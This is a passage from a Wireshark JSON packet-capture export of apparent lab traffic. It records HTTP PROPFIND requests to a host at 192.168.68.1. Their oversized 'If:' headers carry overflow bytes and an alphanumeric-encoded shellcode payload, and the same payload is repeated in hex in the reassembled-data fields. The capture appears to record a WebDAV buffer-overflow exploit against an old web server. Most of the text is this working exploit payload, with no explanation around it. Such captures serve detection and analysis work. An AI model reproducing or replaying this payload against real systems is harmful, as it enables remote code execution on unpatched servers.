"tcp.segment_data": "6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "283",
|
||
"tcp.segment": "284",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1701",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:58:4c:46:4c:53:41:58:50:77:79:49:4e:42:7a:5a:53:54:75:5a:58:53:78:56:7a:6d:58:42:4e:54:54:41:62:76:4f:41:71:75:65:54:76:50:4a:79:43:6e:6a:62:6a:5a:68:57:7a:43:5a:4e:66:63:6d:70:42:46:73:62:58:59:4e:44:7a:66:4c:4b:53:55:4d:4d:78:52:4f:78:54:6b:42:6d:75:61:67:49:69:6d:4a:61:41:6f:69:78:e4:8d:94:e6:b1:82:e6:b1:b2:e6:ad:aa:e5:99:a1:e4:a1:b9:e5:85:82:e4:9d:86:e5:95:a9:e6:85:8d:e5:91:9a:e6:9d:b3:e4:bd:ba:e7:99:94:e4:ad:a4:e4:8d:b9:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:95:98:e6:85:a1:e4:91:95:e6:89:97:e7:81:a6:e7:a5:95:e4:bd:92:e5:85:94:e5:a1:83:e6:b1:82:e6:a5:9a:e6:89:af:e7:91:b0:e6:bd:b2:e4:a9:a9:e4:a5:a5:e6:a5:88:e5:a5:aa:e6:9d:8b:e6:b1:95:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6c:4e:59:71:77:53:6c:57:67:4d:78:6a:76:72:64:53:4d:6e:43:56:56:7a:44:58:63:53:66:4d:45:41:58:59:50:50:62:4c:68:73:6e:75:70:63:63:59:76:6b:72:4f:65:75:4b:72:73:55:4c:6e:42:4a:7a:68:6d:64:4f:52:76:42:57:54:4d:44:6c:70:42:6e:4a:56:54:79:57:50:4a:75:48:61:66:64:52:4c:4f:70:54:58:4c:63:46:e4:b5:84:e5:91:b4:e6:95:82:e5:8d:b7:e6:bd:a6:e4:bd:83:e5:95:8c:e7:95:86:e7:95:ab:e5:81:af:e7:81:92:e5:81:98:e4:b1:90:e4:a9:b5:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:95:94:e6:89:a3:e5:8d:b5:e4:b1:89:e1:8f:80:e6:a0:83:e4:a1:88:e7:89:b0:e6:a5:84:e6:a1:a6:e5:a5:92:e6:a1:95:e6:85:84:e6:bd:99:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/XLFLSAXPwyINBzZSTuZXSxVzmXBNTTAbvOAqueTvPJyCnjbjZhWzCZNfcmpBFsbXYNDzfLKSUMMxROxTkBmuagIimJaAoix<69><78><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/lNYqwSlWgMxjvrdSMnCVVzDXcSfMEAXYPPbLhsnupccYvkrOeuKrsULnBJzhmdORvBWTMDlpBnJVTyWPJuHafdRLOpTXLcF<63><46><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.695907000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.695907000",
|
||
"frame.time_delta": "0.000007000",
|
||
"frame.time_delta_displayed": "0.123673000",
|
||
"frame.time_relative": "16.946847000",
|
||
"frame.number": "307",
|
||
"frame.len": "317",
|
||
"frame.cap_len": "317",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "303",
|
||
"ip.id": "0x00004c79",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000e3e8",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "38117",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "38117",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "52",
|
||
"tcp.len": "251",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3751505032",
|
||
"tcp.nxtseq": "1700",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1156391006",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000934c",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:d7:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:d7:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868503",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000550000",
|
||
"tcp.analysis.bytes_in_flight": "1699",
|
||
"tcp.analysis.push_bytes_sent": "1699"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000863000",
|
||
"tcp.time_delta": "0.000007000"
|
||
},
|
||
"tcp.payload": "39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "306",
|
||
"tcp.segment": "307",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1699",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6d:6d:49:69:71:4c:4e:52:67:67:43:6d:57:75:69:78:4c:6d:4a:6e:59:4c:46:56:73:69:44:4b:73:77:63:57:62:79:4b:7a:50:4e:52:57:44:74:68:4f:7a:4a:69:66:49:48:74:4a:6f:47:61:64:63:42:6d:42:62:6c:6e:76:6f:5a:47:42:6b:73:63:47:66:42:55:6e:6a:4d:41:66:42:6f:6f:64:79:67:4d:57:62:47:65:69:7a:4f:e4:bd:93:e5:a9:a2:e4:85:ad:e4:bd:b0:e5:89:b4:e4:85:b6:e6:b9:b9:e5:99:86:e4:bd:b4:e6:b1:9a:e6:99:99:e4:8d:a1:e7:9d:85:e4:85:89:e4:a5:a5:e6:a5:83:c8:82:c8:82:e1:8b:80:e6:a0:83:e6:85:99:e6:a9:85:e6:b9:84:e5:9d:a9:e5:89:87:e5:a9:b6:e6:a1:a2:e7:8d:b5:e6:91:a6:e6:a9:8c:e7:85:8d:e6:99:a3:e7:85:b2:e6:8d:ab:e7:95:ba:e5:91:8c:e5:95:8f:e4:a1:a3:e7:a5:b2:e6:bd:94:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:41:43:66:76:58:62:47:4a:43:6e:75:67:4a:59:73:59:48:73:69:6c:69:79:62:47:47:76:76:6d:51:70:6e:76:44:69:61:62:65:6a:6d:53:51:68:4a:52:5a:57:56:62:73:6d:70:62:5a:73:41:54:57:75:75:41:77:62:52:57:46:53:79:65:67:45:49:6e:65:52:64:6f:68:79:68:62:41:79:71:59:61:47:64:74:7a:63:51:4f:64:6d:e6:89:b8:e5:85:aa:e5:99:a9:e4:a5:90:e6:b1:8d:e4:a1:af:e7:81:b1:e5:81:a3:e4:b9:85:e7:91:a7:e6:99:91:e4:89:ab:e5:9d:8e:e5:a1:a7:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:a1:b0:e5:8d:83:e6:85:a5:e5:99:91:e1:8f:80:e6:a0:83:e7:9d:b8:e6:85:93:e6:95:ad:e5:91:93:e4:8d:ae:e6:a1:b0:e4:99:b9:e7:89:b4:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:8